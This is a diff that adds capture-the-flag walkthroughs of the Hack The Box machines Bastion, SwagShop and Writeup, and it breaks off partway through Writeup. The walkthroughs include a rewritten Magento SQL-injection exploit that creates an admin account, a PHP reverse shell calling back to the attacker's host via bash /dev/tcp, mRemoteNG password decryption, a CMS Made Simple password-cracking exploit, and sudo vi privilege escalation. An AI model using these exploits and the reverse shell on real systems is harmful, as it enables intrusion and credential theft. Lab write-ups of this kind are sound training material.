+ 22-02-2019 14:42 <****DIR> PerfLogs
+ 27-08-2019 10:20 <****DIR> Program Files
+ 22-02-2019 14:01 <****DIR> Program Files (x86)
+ 22-02-2019 13:50 <****DIR> Users
+ 12-02-2020 19:07 <****DIR> Windows
+ 0 File(s) 0 bytes
+ 7 Dir(s) 11.297.501.184 bytes free
+
+ l4mpje@BASTION C:\>cd Program Files (x86)
+
+ l4mpje@BASTION C:\Program Files (x86)>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\Program Files (x86)
+
+ 22-02-2019 14:01 <****DIR> .
+ 22-02-2019 14:01 <****DIR> ..
+ 16-07-2016 14:23 <****DIR> Common Files
+ 23-02-2019 09:38 <****DIR> Internet Explorer
+ 16-07-2016 14:23 <****DIR> Microsoft.NET
+ 22-02-2019 14:01 <****DIR> mRemoteNG
+ 23-02-2019 10:22 <****DIR> Windows Defender
+ 23-02-2019 09:38 <****DIR> Windows Mail
+ 23-02-2019 10:22 <****DIR> Windows Media Player
+ 16-07-2016 14:23 <****DIR> Windows Multimedia Platform
+ 16-07-2016 14:23 <****DIR> Windows NT
+ 23-02-2019 10:22 <****DIR> Windows Photo Viewer
+ 16-07-2016 14:23 <****DIR> Windows Portable Devices
+ 16-07-2016 14:23 <****DIR> WindowsPowerShell
+ 0 File(s) 0 bytes
+ 14 Dir(s) 11.297.501.184 bytes free
+
+looking at the program files(x86) folder we see something interesting here, the mRemoteNG which is an open source, tabbed, multi-protocol, remote connections manager. looking at this [article](http://hackersvanguard.com/mremoteng-insecure-password-storage/) made by hackersvanguard.com, we see that it is possible to decrypt passwords. However for this example we'll use another solution in order to remain within the linux environment, using a this [ python script](https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py)
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py
+ usage: mremoteng.py [-h] [-f FILE | -s STRING] [-p PASSWORD]
+
+ Decrypt mRemoteNG passwords.
+
+ optional arguments:
+ -h, --help show this help message and exit
+ -f FILE, --file FILE name of file containing mRemoteNG password
+ -s STRING, --string STRING
+ base64 string of mRemoteNG password
+ -p PASSWORD, --password PASSWORD
+ Custom password
+
+
+using python3 to print out the help menu we see that we will have to setup a few flags : first of all we need the string of the encrypted mremoteng password, which according to the aforementioned blog post is located in the config file, so let's navigate there
+
+
+ PS C:\Users\L4mpje> cd \Users\L4mpje\Appdata\Roaming
+ PS C:\Users\L4mpje\Appdata\Roaming> dir
+
+
+ Directory: C:\Users\L4mpje\Appdata\Roaming
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 22-2-2019 13:50 Adobe
+ d---s- 22-2-2019 13:52 Microsoft
+ d----- 22-2-2019 14:03 mRemoteNG
+
+
+moving into mRemoteNG we print out the contents of confCons.xml
+
+
+ PS C:\Users\L4mpje\Appdata\Roaming> cd .\mRemoteNG\
+ PS C:\Users\L4mpje\Appdata\Roaming\mRemoteNG> dir
+
+
+ Directory: C:\Users\L4mpje\Appdata\Roaming\mRemoteNG
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 22-2-2019 14:01 Themes
+ -a---- 22-2-2019 14:03 6316 confCons.xml
+ -a---- 22-2-2019 14:02 6194 confCons.xml.20190222-1402277353.backup
+ -a---- 22-2-2019 14:02 6206 confCons.xml.20190222-1402339071.backup
+ -a---- 22-2-2019 14:02 6218 confCons.xml.20190222-1402379227.backup
+ -a---- 22-2-2019 14:02 6231 confCons.xml.20190222-1403070644.backup
+ -a---- 22-2-2019 14:03 6319 confCons.xml.20190222-1403100488.backup
+ -a---- 22-2-2019 14:03 6318 confCons.xml.20190222-1403220026.backup
+ -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403261268.backup
+ -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403272831.backup
+ -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403433299.backup
+ -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403486580.backup
+ -a---- 22-2-2019 14:03 51 extApps.xml
+ -a---- 22-2-2019 14:03 5217 mRemoteNG.log
+ -a---- 22-2-2019 14:03 2245 pnlLayout.xml
+
+
+ PS C:\Users\L4mpje\Appdata\Roaming\mRemoteNG> type confCons.xml
+ Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
+
+
+and there we have our encrypted password string ! let's try out the python script we just got to see if it can decrypt it.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
+ Password: bureaulampje
+
+
+we already have that one, so we need to check for another one
+
+
+ Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
+
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
+ Password: thXLHM96BeKL0ER2
+
+
+seems like we have a password for the Administrator user, let's see if we can SSH as the Administrator user.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ssh Administrator@10.10.10.134
+ Administrator@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ administrator@BASTION C:\Users\Administrator>whoami
+ bastion\administrator
+
+
+And there we go, we are logged in as Administrator ! all that's left to do is to print out the root flag.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ssh Administrator@10.10.10.134
+ Administrator@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ administrator@BASTION C:\Users\Administrator>whoami
+ bastion\administrator
+
+ administrator@BASTION C:\Users\Administrator>cd Desktop
+
+ administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
+ 95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/32.md b/Easy/32.md
new file mode 100644
index 0000000..6f85091
--- /dev/null
+++ b/Easy/32.md
@@ -0,0 +1,377 @@
+# SwagShop Writeup
+
+
+
+## Introduction :
+
+SwagShop is an easy Linux box that was released back in May 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → ping 10.10.10.140
+ PING 10.10.10.140 (10.10.10.140) 56(84) bytes of data.
+ 64 bytes from 10.10.10.140: icmp_seq=1 ttl=63 time=84.7 ms
+ 64 bytes from 10.10.10.140: icmp_seq=2 ttl=63 time=73.5 ms
+ 64 bytes from 10.10.10.140: icmp_seq=3 ttl=63 time=80.2 ms
+ ^C
+ --- 10.10.10.140 ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 73.461/79.465/84.723/4.627 ms
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.140
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 12:59 CET
+ Nmap scan report for 10.10.10.140
+ Host is up (0.078s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sCV -p22,80 10.10.10.140
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 13:00 CET
+ Nmap scan report for 10.10.10.140
+ Host is up (0.080s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
+ | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
+ |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Home page
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+We see that our nmap scan picked up the 80th port, let's enumerate it using dirsearch.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → dirsearch -u http://10.10.10.140/ -e php,html,js,txt -x 403 -r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, js, txt | HTTP method: get | Threads: 10 | Wordlist size: 7107 | Recursion level: 1
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-13_13-07-32.log
+
+ Target: http://10.10.10.140/
+
+ [13:07:32] Starting:
+
+
+While that runs in the background, we browse to it and see what we're dealing with.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → curl -sk http://10.10.10.140 | grep Magento
+ <****address class="copyright">(C) 2014 Magento Demo Store. All Rights Reserved.<**/address>
+
+
+Seems like we have a Magento webserver to work with ! let's run a quick searchsploit command with the Magento command to see which exploits are publicly available for this service.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit Magento
+ ------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------- ----------------------------------------
+ Magento 1.2 - '/app/code/core/Mage/A | exploits/php/webapps/32808.txt
+ Magento 1.2 - '/app/code/core/Mage/A | exploits/php/webapps/32809.txt
+ Magento 1.2 - 'downloader/index.php' | exploits/php/webapps/32810.txt
+ Magento < 2.0.6 - Arbitrary Unserial | exploits/php/webapps/39838.php
+ Magento CE < 1.9.0.1 - (Authenticate | exploits/php/webapps/37811.py
+ Magento Server MAGMI Plugin - Multip | exploits/php/webapps/35996.txt
+ Magento Server MAGMI Plugin 0.7.17a | exploits/php/webapps/35052.txt
+ Magento eCommerce - Local File Discl | exploits/php/webapps/19793.txt
+ Magento eCommerce - Remote Code Exec | exploits/xml/webapps/37977.py
+ eBay Magento 1.9.2.1 - PHP FPM XML e | exploits/php/webapps/38573.txt
+ eBay Magento CE 1.9.2.1 - Unrestrict | exploits/php/webapps/38651.txt
+ ------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Let's first locate the python script n° 37977 which could possibly give us the ability to execute remote code onto the webserver.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → locate 37977.py
+ /usr/share/exploitdb/exploits/xml/webapps/37977.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → cp /usr/share/exploitdb/exploits/xml/webapps/37977.py .
+
+
+Now that's saved locally, we'll continue searching a bit before coming back to it. Meanwhile our dirsearch scan returned with a few results for us :
+
+
+ [13:07:33] 301 - 309B - /js -> http://10.10.10.140/js/
+ [13:07:53] 301 - 310B - /app -> http://10.10.10.140/app/
+ [13:07:54] 200 - 5KB - /app/etc/config.xml
+ [13:07:54] 200 - 2KB - /app/etc/local.xml
+ [13:07:54] 200 - 9KB - /app/etc/local.xml.additional
+ [13:07:54] 200 - 2KB - /app/etc/local.xml.template
+ [13:08:01] 200 - 717B - /cron.sh
+ [13:08:01] 200 - 0B - /cron.php
+ [13:08:04] 301 - 313B - /errors -> http://10.10.10.140/errors/
+ [13:08:04] 200 - 2KB - /errors/
+ [13:08:05] 200 - 1KB - /favicon.ico
+ [13:08:09] 200 - 946B - /includes/
+ [13:08:09] 301 - 315B - /includes -> http://10.10.10.140/includes/
+ [13:08:09] 200 - 16KB - /index.php
+ [13:08:10] 200 - 44B - /install.php
+ [13:08:11] 301 - 318B - /js/tiny_mce -> http://10.10.10.140/js/tiny_mce/
+ [13:08:11] 200 - 4KB - /js/tiny_mce/
+ [13:08:11] 301 - 310B - /lib -> http://10.10.10.140/lib/
+ [13:08:11] 200 - 10KB - /LICENSE.txt
+ [13:08:14] 301 - 312B - /media -> http://10.10.10.140/media/
+ [13:08:18] 200 - 886B - /php.ini.sample
+ [13:08:20] 301 - 314B - /pkginfo -> http://10.10.10.140/pkginfo/
+ [13:08:23] 200 - 571KB - /RELEASE_NOTES.txt
+ [13:08:24] 301 - 312B - /shell -> http://10.10.10.140/shell/
+ [13:08:24] 200 - 2KB - /shell/
+ [13:08:26] 301 - 311B - /skin -> http://10.10.10.140/skin/
+ [13:08:31] 200 - 755B - /var/backups/
+ [13:08:31] 301 - 310B - /var -> http://10.10.10.140/var/
+ [13:08:31] 200 - 4KB - /var/cache/
+
+
+Seems like our dirsearch scan came back with a few interesting directories for us to inspect. Let's use a web browser of our choice to inspect the /app directory. For this example we'll use lynx.
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → lynx http://10.10.10.140/app/
+
+
+
+
+
+Seems like we can list it's contents ! Let's navigate into etc.
+
+
+
+Locale.xml seems juicy.
+
+
+ Wed, 08 May 2019 07:23:09 +0000 b355a9e0cd018d3f7f03607141518419
+ false localhost root fMVWh7bDHpgZkyfqQXreTjU9 swagshop SET NAMES utf8
+ mysql4 pdo_mysql 1 files admin
+
+
+And we have credentials ! although the password seems to be encrypted. Let's return to our python script n°37977 and see if we are able to execute it in either python1, 2 or 3.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python3 37977.py
+ File "37977.py", line 9
+ ////////////////////////
+ ^
+ SyntaxError: invalid syntax
+
+
+Looking at the results, we see that the script has been badly written so we will re-write it.
+
+
+ 37977.py
+ import requests
+ import base64
+ import sys
+
+ target = "http://10.10.10.140/"
+
+ if not target.startswith("http"):
+ target = "http://" + target
+
+ if target.endswith("/"):
+ target = target[:-1]
+
+ target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
+
+ q="""
+ SET @SALT = 'rp';
+ SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+ SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+ INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+ INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+ """
+
+
+ query = q.replace("\n", "").format(username="forme", password="forme")
+ pfilter = "popularity[from]=0&popularity;[to]=3&popularity;[field_expr]=0);{0}".format(query)
+
+ # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+ r = requests.post(target_url,
+ data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+ "filter": base64.b64encode(pfilter),
+ "forwarded": 1})
+ if r.ok:
+ print "WORKED"
+ print "Check {0}/admin with creds forme:forme".format(target)
+ else:
+ print "DID NOT WORK"
+
+
+Now that the script has been re-written, we try to launch it in the same way we tried before.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python 37977.py
+ File "37977.py", line 33
+ print "WORKED"
+ ^
+ SyntaxError: Missing parentheses in call to 'print'. Did you mean print("WORKED")?
+
+
+Let's not forget that this script is a bit old and has got it's print statements without any parentheses so we will use python2 to launch it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ DID NOT WORK
+
+
+Out of luck ! That's because it's not the correct url. we need to replace the URL at the top with "http://10.10.10.140/index.php/"
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → nano 37977.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → python2 37977.py
+ WORKED
+ Check http://10.10.10.140/index.php/admin with creds forme:forme
+
+
+
+And it worked ! let's check out the login page with the credentials forme:forme.
+
+ 
+
+We have been able to log in ! Now looking back at our searchsploit results we see yet another python script that looks intersting, let's copy it into our current directory.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/SwagShop]
+ → nano nihilist.jpg
+
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.10/1234 0>&1'");
+ ?****>
+
+
+
+next we go to newsletter > newsletter templates > add new template and do the following :
+
+
+
+next we go to System > configuration > developer > template settings > allow symlinks and therefore we should be able to preview our template which will browse to the php reverse shell hidden in the thumbnail jpg named nihilist.jpg, which should send the incoming shell connection to our netcat listener on port 1234
+
+
+ λ nihilist [ 10.10.14.10/23 ] [/usr/share]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.140] 53234
+ bash: cannot set terminal process group (1292): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@swagshop:/var/www/html$ cd /home && ls
+ haris
+ www-data@swagshop:/home$ cd haris
+ cd haris
+ www-data@swagshop:/home/haris$ cat user.txt
+ cat user.txt
+ a4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+we type sudo -l
+
+
+ www-data@swagshop:/home/haris$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on swagshop:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on swagshop:
+ (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+ www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/nihilist
+ sudo /usr/bin/vi /var/www/html/nihilist
+ Vim: Warning: Output is not to a terminal
+ Vim: Warning: Input is not from a terminal
+
+ E558: Terminal entry not found in terminfo
+ 'unknown' not known. Available builtin terminals are:
+ builtin_amiga
+ builtin_beos-ansi
+ builtin_ansi
+ builtin_pcansi
+ builtin_win32
+ builtin_vt320
+ builtin_vt52
+ builtin_xterm
+ builtin_iris-ansi
+ builtin_debug
+ builtin_dumb
+ defaulting to 'ansi'
+
+
+ :!/bin/bash
+ whoami
+ root
+ cat /root/root.txt
+ c2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ ___ ___
+ /| |/|\| |\
+ /_| ´ |.` |_\ We are open! (Almost)
+ | |. |
+ | |. | Join the beta HTB Swag Store!
+ |___|.__| https://hackthebox.store/password
+
+ PS: Use root flag as password!
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/33.md b/Easy/33.md
new file mode 100644
index 0000000..c07b50f
--- /dev/null
+++ b/Easy/33.md
@@ -0,0 +1,329 @@
+# Writeup Writeup
+
+
+
+## Introduction :
+
+Writeup is an easy Linux box that was released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nmap -F 10.10.10.138
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT
+ Nmap scan report for writeup.htb (10.10.10.138)
+ Host is up (0.098s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.30 seconds
+
+
+Looks like we have 2 ports opened, let's investigate the 80th port.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nmap -sCV -p80 10.10.10.138
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT
+ Nmap scan report for writeup.htb (10.10.10.138)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ | http-robots.txt: 1 disallowed entry
+ |_/writeup/
+ |_http-title: Nothing here yet.
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
+
+
+let's add writeup.htb to our /etc/hosts
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → echo '10.10.10.138 writeup.htb' >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Taking a first glance at the webpage on port 80, we use the curl command with the -sk flags.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://writeup.htb/
+
+ ########################################################################
+ # #
+ # *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS *** #
+ # #
+ # Not yet live and already under attack. I found an ,~~--~~-. #
+ # Eeyore DoS protection script that is in place and + | |\ #
+ # watches for Apache 40x errors and bans bad IPs. || |~ |`,/-\ #
+ # Hope you do not get hit by false-positive drops! *\_) \_) `-' #
+ # #
+ # If you know where to download the proper Donkey DoS protection #
+ # please let me know via mail to jkr@writeup.htb - thanks! #
+ # #
+ ########################################################################
+
+ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+ 88888888888888888888888888888888888888888888888888888
+ 8888"""""""""""""""8888888888888888888888888888888888
+ 8888 8888888888888888888888888888888888
+ 8888 HTB NOTES 8888888888888888888888888888888888
+ 8888 888888888888888888888888888888888"
+ 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888":::::"88888888888888888888888
+ 888888888888888888888::;gPPRg;::888888888888888888888
+ 88888888888888888888::dP' `Yb::88888888888888888888
+ 88888888888888888888::8) (8::88888888888888888888
+ 88888888888888888888;:Yb dP:;88( )888888888888888
+ 888888888888888888888;:"8ggg8":;888888888888888888888
+ 88888888888888888888888aa:::aa88888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888888888888888888888888888888
+ 88888888888888888888888888"88888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 8888888888888888888888888:::8888888888888888888888888
+ 88888888888888888888888888a88888888888888888888888888
+ """""""""""""""""""' `"""""""""' `"""""""""""""""""""
+ (c) by Normand Veilleux
+
+
+ I am still searching through my backups so there is
+ nothing here yet. I am preparing go-live of my own
+ app.hackthebox.eu write-up page soon. Stay tuned!
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
+
+
+nothing too interesting there, apart from some information about "Apache 40x", let's run dirsearch to see which directories we can find.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-15_08-47-45.log
+
+ Target: http://writeup.htb/
+
+ [08:47:45] Starting:
+ 0.84% - Last request to: .bzr/README
+
+
+looks like this was a bad idea, the server seems to have blacklisted us. Instead we will use the nikto command.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nikto -h http://10.10.10.138/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.138
+ + Target Hostname: 10.10.10.138
+ + Target Port: 80
+ + Start Time: 2020-02-15 08:52:24 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.25 (Debian)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ + Scan terminated: 20 error(s) and 3 item(s) reported on remote host
+ + End Time: 2020-02-15 08:53:16 (GMT0) (52 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+
+nothing too interesting there, nikto seems to timeout on the host, let's check robots.txt
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://10.10.10.138/robots.txt
+ # __
+ # _(\ |@@|
+ # (__/\__ \--/ __
+ # \___|----| | __
+ # \ }{ /\ )_ / _\
+ # /\__/\ \__O (__
+ # (--/\--) \__/
+ # _)( )(_
+ # `---''---`
+
+ # Disallow access to the blog until content is finished.
+ User-agent: *
+ Disallow: /writeup/
+
+
+checking out http://10.10.10.138/writeup/ , we are greeted with some sort of a menu, let's look at it's source menu for anything fancy.
+
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → curl -sk http://10.10.10.138/writeup/ | grep CMS
+ <****meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." /****>
+
+looks like we have a CMS Made Simple from 2004 ! let's run a quick searchsploit command to see which exploits are available for us
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → searchsploit CMS Made Simple | grep Injection
+ CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | exploits/php/webapps/29941.txt
+ CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | exploits/php/webapps/4810.txt
+ CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
+
+
+exploit number 46635.py looks interesting, let's locate it and paste it in our current folder.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → locate 46635.py
+ /usr/share/exploitdb/exploits/php/webapps/46635.py
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → cp /usr/share/exploitdb/exploits/php/webapps/46635.py .
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → nano 46635.py
+
+
+Looking at the exploit we're going to use, we'll need to specify a few flags : -u for the URL --crack and -w for wordlist
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
+
+ [+] Salt for password found: 5a599ef579066807
+ [+] Username found: jkr
+ [+] Email found: jkr@writeup.htb
+ [+] Password found: 62def4866937f08cc13bab43bb14e6f7
+ [+] Password cracked: raykayjay9
+
+
+
+looks like our exploit worked ! we now have credentials to work with : jkr:raykayjay9 , let's try to get in using ssh.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → ssh jkr@writeup.htb
+ The authenticity of host 'writeup.htb (10.10.10.138)' can't be established.
+ ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts.
+ jkr@writeup.htb's password:
+ Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
+
+ The programs included with the Devuan GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
